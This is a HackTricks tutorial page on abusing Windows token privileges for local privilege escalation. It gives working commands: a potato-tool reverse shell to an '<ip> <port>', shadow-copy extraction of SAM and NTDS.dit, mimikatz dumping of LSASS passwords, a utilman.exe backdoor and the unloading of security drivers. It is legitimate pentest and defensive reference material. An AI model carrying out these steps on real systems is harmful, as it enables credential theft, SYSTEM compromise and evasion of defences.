privilege-escalation-abusing-tokens.md (23314B)
1 --- 2 title: "Abusing Tokens" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Abusing Tokens 14 15 ## Tokens 16 17 If you **don't know what are Windows Access Tokens** read this page before continuing: 18 19 20 [Access Tokens](/hacktricks/windows-hardening/windows-local-privilege-escalation/access-tokens) 21 22 **You may be able to escalate privileges by abusing tokens you already hold.** 23 24 ### SeImpersonatePrivilege 25 26 This privilege allows a process to impersonate (but not create) a token when it can obtain a handle to that token. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling execution of a process with SYSTEM privileges.<sup>[[2]](#references)</sup> This primitive can be exploited using tools such as [JuicyPotato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires WinRM to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). 27 28 Modern operator notes: 29 30 - **JuicyPotato is legacy**: on Windows 10 1809+/Server 2019+, prefer **GodPotato**, **SigmaPotato**, **PrintNotifyPotato**, **RoguePotato**, **SharpEfsPotato/EfsPotato**, or **PrintSpoofer** depending on which RPC/COM surface is still reachable. 31 - If you compromised a service running as **`LOCAL SERVICE`** or **`NETWORK SERVICE`** and `whoami /priv` shows a **filtered token** without `SeImpersonatePrivilege`/`SeAssignPrimaryTokenPrivilege`, recover the account's **default privilege set** first (for example with **FullPowers**) and retry the potato family afterwards.<sup>[[3]](#references)</sup> 32 - Some newer forks are more operator-friendly than the original tools. For example, **SigmaPotato** adds reflection/in-memory execution and modern Windows compatibility, while **PrintNotifyPotato** abuses the PrintNotify COM service and is often useful when the classic Spooler path is disabled. 33 34 ```batch 35 FullPowers.exe -c "cmd /c whoami /priv" -z 36 GodPotato.exe -cmd "cmd /c whoami" 37 SigmaPotato.exe --revshell <ip> <port> 38 PrintNotifyPotato.exe whoami 39 ``` 40 41 42 [Roguepotato And Printspoofer](/hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer) 43 44 45 [Juicypotato](/hacktricks/windows-hardening/windows-local-privilege-escalation/juicypotato) 46 47 ### SeAssignPrimaryPrivilege 48 49 It is very similar to **SeImpersonatePrivilege**, it will use the **same method** to get a privileged token.\ 50 Then, this privilege allows **to assign a primary token** to a new/suspended process. With the privileged impersonation token you can derivate a primary token (DuplicateTokenEx).\ 51 With the token, you can create a **new process** with 'CreateProcessAsUser' or create a process suspended and **set the token** (in general, you cannot modify the primary token of a running process).<sup>[[2]](#references)</sup> 52 53 ### SeTcbPrivilege 54 55 If you have enabled this token you can use **KERB_S4U_LOGON** to get an **impersonation token** for any other user without knowing the credentials, **add an arbitrary group** (admins) to the token, set the **integrity level** of the token to "**medium**", and assign this token to the **current thread** (SetThreadToken).<sup>[[2]](#references)</sup> 56 57 ### SeBackupPrivilege 58 59 The system is caused to **grant all read access** control to any file (limited to read operations) by this privilege. It is utilized for **reading the password hashes of local Administrator** accounts from the registry, following which, tools like "**psexec**" or "**wmiexec**" can be used with the hash (Pass-the-Hash technique). However, this technique fails under two conditions: when the Local Administrator account is disabled, or when a policy is in place that removes administrative rights from Local Administrators connecting remotely.<sup>[[2]](#references)</sup>\ 60 In practice, the most reliable built-in workflow is usually **VSS + `robocopy /b`**: create/expose a shadow copy, then copy `SAM`/`SYSTEM` or `NTDS.dit` in **backup mode**, which bypasses the file ACLs.<sup>[[4]](#references)</sup> 61 62 ```batch 63 :: shadow.txt 64 set context persistent nowriters 65 add volume c: alias tk 66 create 67 expose %tk% z: 68 69 :: then copy sensitive files from the snapshot 70 diskshadow /s shadow.txt 71 robocopy /b z:\Windows\System32\Config C:\temp SAM SYSTEM SECURITY 72 robocopy /b z:\Windows\NTDS C:\temp ntds.dit 73 ``` 74 75 You can **abuse this privilege** with: 76 77 - [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1) 78 - [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) 79 - following **IppSec** in [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610&ab_channel=IppSec) 80 - Or as explained in the **escalating privileges with Backup Operators** section of: 81 82 83 [Privileged Groups And Token Privileges](/hacktricks/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges) 84 85 ### SeRestorePrivilege 86 87 Permission for **write access** to any system file, irrespective of the file's Access Control List (ACL), is provided by this privilege. It opens up numerous possibilities for escalation, including the ability to **modify services**, perform DLL Hijacking, and set **debuggers** via Image File Execution Options among various other techniques.<sup>[[2]](#references)</sup> 88 89 ### SeCreateTokenPrivilege 90 91 SeCreateTokenPrivilege is a powerful permission, especially useful when a user possesses the ability to impersonate tokens, but also in the absence of SeImpersonatePrivilege. This capability hinges on the ability to impersonate a token that represents the same user and whose integrity level does not exceed that of the current process.<sup>[[2]](#references)</sup> 92 93 **Key Points:** 94 95 - **Impersonation without SeImpersonatePrivilege:** It's possible to leverage SeCreateTokenPrivilege for EoP by impersonating tokens under specific conditions. 96 - **Conditions for Token Impersonation:** Successful impersonation requires the target token to belong to the same user and have an integrity level that is less or equal to the integrity level of the process attempting impersonation. 97 - **Creation and Modification of Impersonation Tokens:** Users can create an impersonation token and enhance it by adding a privileged group's SID (Security Identifier). 98 99 ### SeLoadDriverPrivilege 100 101 This privilege allows a process to **load and unload device drivers** by creating a registry entry with specific `ImagePath` and `Type` values. Since direct write access to `HKLM` (HKEY_LOCAL_MACHINE) is restricted, `HKCU` (HKEY_CURRENT_USER) can be used instead. However, a specific path is required to make the `HKCU` entry recognizable to the kernel as a driver configuration.<sup>[[2]](#references)</sup> 102 103 Modern offensive use is usually **BYOVD** (bring your own vulnerable driver): load a **signed but vulnerable** kernel driver and then use its IOCTLs to disable protections or jump to kernel code execution. Keep in mind that on recent Windows 11/Server builds the **Microsoft vulnerable driver blocklist** and/or **HVCI/Memory Integrity** often break older public chains, so the classic `szkg64.sys`-style examples are no longer universally reliable. 104 105 This path is `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`, where `<RID>` is the Relative Identifier of the current user. Inside `HKCU`, this entire path must be created, and two values need to be set:<sup>[[2]](#references)</sup> 106 107 - `ImagePath`, which is the path to the binary to be executed 108 - `Type`, with a value of `SERVICE_KERNEL_DRIVER` (`0x00000001`). 109 110 **Steps to Follow:** 111 112 1. Access `HKCU` instead of `HKLM` due to restricted write access. 113 2. Create the path `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName` within `HKCU`, where `<RID>` represents the current user's Relative Identifier. 114 3. Set the `ImagePath` to the binary's execution path. 115 4. Assign the `Type` as `SERVICE_KERNEL_DRIVER` (`0x00000001`). 116 117 ```python 118 # Example Python code to set the registry values 119 import winreg as reg 120 121 # Define the path and values 122 path = r'Software\YourPath\System\CurrentControlSet\Services\DriverName' # Adjust 'YourPath' as needed 123 key = reg.OpenKey(reg.HKEY_CURRENT_USER, path, 0, reg.KEY_WRITE) 124 reg.SetValueEx(key, "ImagePath", 0, reg.REG_SZ, "path_to_binary") 125 reg.SetValueEx(key, "Type", 0, reg.REG_DWORD, 0x00000001) 126 reg.CloseKey(key) 127 ``` 128 129 More ways to abuse this privilege in [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges#seloaddriverprivilege](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges#seloaddriverprivilege) 130 131 ### SeTakeOwnershipPrivilege 132 133 This is similar to **SeRestorePrivilege**. Its primary function allows a process to **assume ownership of an object**, circumventing the requirement for explicit discretionary access through the provision of WRITE_OWNER access rights. The process involves first securing ownership of the intended registry key for writing purposes, then altering the DACL to enable write operations.<sup>[[2]](#references)</sup> 134 135 ```bash 136 takeown /f 'C:\some\file.txt' #Now the file is owned by you 137 icacls 'C:\some\file.txt' /grant <your_username>:F #Now you have full access 138 # Use this with files that might contain credentials such as 139 %WINDIR%\repair\sam 140 %WINDIR%\repair\system 141 %WINDIR%\repair\software 142 %WINDIR%\repair\security 143 %WINDIR%\system32\config\security.sav 144 %WINDIR%\system32\config\software.sav 145 %WINDIR%\system32\config\system.sav 146 %WINDIR%\system32\config\SecEvent.Evt 147 %WINDIR%\system32\config\default.sav 148 c:\inetpub\wwwwroot\web.config 149 ``` 150 151 ### SeDebugPrivilege 152 153 This privilege permits the **debug other processes**, including to read and write in the memory. Various strategies for memory injection, capable of evading most antivirus and host intrusion prevention solutions, can be employed with this privilege.<sup>[[2]](#references)</sup> 154 155 On modern Windows, remember that `SeDebugPrivilege` is usually enough to open **non-protected SYSTEM processes** and duplicate their tokens, but it is **not** a guarantee that you can touch **LSASS**. If **RunAsPPL / LSA Protection** is enabled, non-protected processes cannot read or inject into LSASS even if `SeDebugPrivilege` is present. In that case, steal a token from another non-PPL SYSTEM process, or chain with a PPL bypass/BYOVD instead of assuming `procdump` will work. For a full token-copy example using `SeDebugPrivilege` + `SeImpersonatePrivilege`, check [this page](/hacktricks/windows-hardening/windows-local-privilege-escalation/sedebug-seimpersonate-copy-token). 156 157 #### Dump memory 158 159 You could use [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) from the [SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) to **capture the memory of a process**. Specifically, this can apply to the **Local Security Authority Subsystem Service (**[**LSASS**](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)**)** process, which is responsible for storing user credentials once a user has successfully logged into a system. 160 161 You can then load this dump in mimikatz to obtain passwords: 162 163 ```text 164 mimikatz.exe 165 mimikatz # log 166 mimikatz # sekurlsa::minidump lsass.dmp 167 mimikatz # sekurlsa::logonpasswords 168 ``` 169 170 #### RCE 171 172 If you want to get a `NT SYSTEM` shell you could use: 173 174 - [**SeDebugPrivilege-Exploit (C++)**](https://github.com/bruno-1337/SeDebugPrivilege-Exploit) 175 - [**SeDebugPrivilegePoC (C#)**](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC) 176 - [**psgetsys.ps1 (Powershell Script)**](https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1) 177 178 ```bash 179 # Get the PID of a process running as NT SYSTEM 180 import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>) 181 ``` 182 183 ### SeManageVolumePrivilege 184 185 This right (Perform volume maintenance tasks) allows opening raw volume device handles (e.g., \\.\C:) for direct disk I/O that bypasses NTFS ACLs. With it you can copy bytes of any file on the volume by reading the underlying blocks, enabling arbitrary file read of sensitive material (e.g., machine private keys in %ProgramData%\Microsoft\Crypto\, registry hives, SAM/NTDS via VSS).<sup>[[5]](#references)</sup> It’s particularly impactful on CA servers where exfiltrating the CA private key enables forging a Golden Certificate to impersonate any principal.<sup>[[6]](#references)</sup> 186 187 See detailed techniques and mitigations: 188 189 [Semanagevolume Perform Volume Maintenance Tasks](/hacktricks/windows-hardening/windows-local-privilege-escalation/semanagevolume-perform-volume-maintenance-tasks) 190 191 ## Check privileges 192 193 ```text 194 whoami /priv 195 ``` 196 197 The **tokens that appear as Disabled** can usually be enabled, so you can often abuse both _Enabled_ and _Disabled_ privileges. 198 199 ### Enable All the tokens 200 201 If you have disabled privileges, you can use the script [**EnableAllTokenPrivs.ps1**](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1) to enable all the tokens: 202 203 ```bash 204 .\EnableAllTokenPrivs.ps1 205 whoami /priv 206 ``` 207 208 Or the **script** embedded in this [**post**](https://www.leeholmes.com/adjusting-token-privileges-in-powershell/). 209 210 ## Table 211 212 Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin), summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.<sup>[[1]](#references)</sup> 213 214 | Privilege | Impact | Tool | Execution path | Remarks | 215 | -------------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | 216 | **`SeAssignPrimaryToken`** | _**Admin**_ | 3rd party tool | _"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"_ | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. | 217 | **`SeBackup`** | **Threat** | _**Built-in commands**_ | Read sensitive files with `robocopy /b` or dedicated SeBackup-aware copy helpers. | <p>- Great for `SAM`/`SYSTEM`, `SECURITY`, `NTDS.dit`, and sometimes `%WINDIR%\MEMORY.DMP`.<br><br>- `robocopy` is convenient, but dedicated SeBackup cmdlets/APIs are often more flexible for locked/open files.</p> | 218 | **`SeCreateToken`** | _**Admin**_ | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. | | 219 | **`SeDebug`** | _**Admin**_ | **PowerShell** | Duplicate a **non-PPL** SYSTEM token or dump memory from a non-protected process. | <p>LSASS dumping is commonly blocked if RunAsPPL/LSA Protection is enabled.</p><p>Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1)</p> | 220 | **`SeImpersonate`** | _**Admin**_ | 3rd party tool | Use the **Potato family** / named-pipe impersonation to spawn SYSTEM (`PrintSpoofer`, `RoguePotato`, `GodPotato`, `SigmaPotato`, `PrintNotifyPotato`, etc.). | <p>Most practical from service accounts such as IIS APPPOOL, MSSQL, scheduled tasks, or any context that already owns `SeImpersonatePrivilege`.</p> | 221 | **`SeLoadDriver`** | _**Admin**_ | 3rd party tool | <p>1. Load a signed-but-vulnerable kernel driver (BYOVD)<br>2. Use the driver's IOCTLs to get kernel R/W, disable security tooling, or elevate to SYSTEM<br><br>Alternatively, the privilege may be used to unload security-related drivers with <code>fltMC</code> builtin command, i.e. <code>fltMC sysmondrv</code></p> | <p>Older public drivers such as <code>szkg64.sys</code> are increasingly blocked on modern Windows by the vulnerable-driver blocklist / HVCI.</p> | 222 | **`SeRestore`** | _**Admin**_ | **PowerShell** | <p>1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with <a href="https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1">Enable-SeRestorePrivilege</a>).<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U</p> | <p>Attack may be detected by some AV software.</p><p>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege</p> | 223 | **`SeTakeOwnership`** | _**Admin**_ | _**Built-in commands**_ | <p>1. <code>takeown.exe /f "%windir%\system32"</code><br>2. <code>icacls.exe "%windir%\system32" /grant "%username%":F</code><br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U</p> | <p>Attack may be detected by some AV software.</p><p>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.</p> | 224 | **`SeTcb`** | _**Admin**_ | 3rd party tool | <p>Manipulate tokens to have local admin rights included. May require SeImpersonate.</p><p>To be verified.</p> | | 225 226 ## References 227 228 - [1] [gtworek/Priv2Admin - exploitation paths from Windows privileges to admin](https://github.com/gtworek/Priv2Admin) 229 - [2] [Abusing Token Privileges For LPE](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt) 230 - [3] [itm4n – Give Me Back My Privileges! Please?](https://itm4n.github.io/localservice-privileges/) 231 - [4] [Microsoft – Robocopy (`/b` backup mode bypasses file/folder ACL checks)](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy) 232 - [5] [Microsoft – Perform volume maintenance tasks (SeManageVolumePrivilege)](https://learn.microsoft.com/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/perform-volume-maintenance-tasks) 233 - [6] [0xdf – HTB: Certificate (SeManageVolumePrivilege → CA key exfil → Golden Certificate)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html)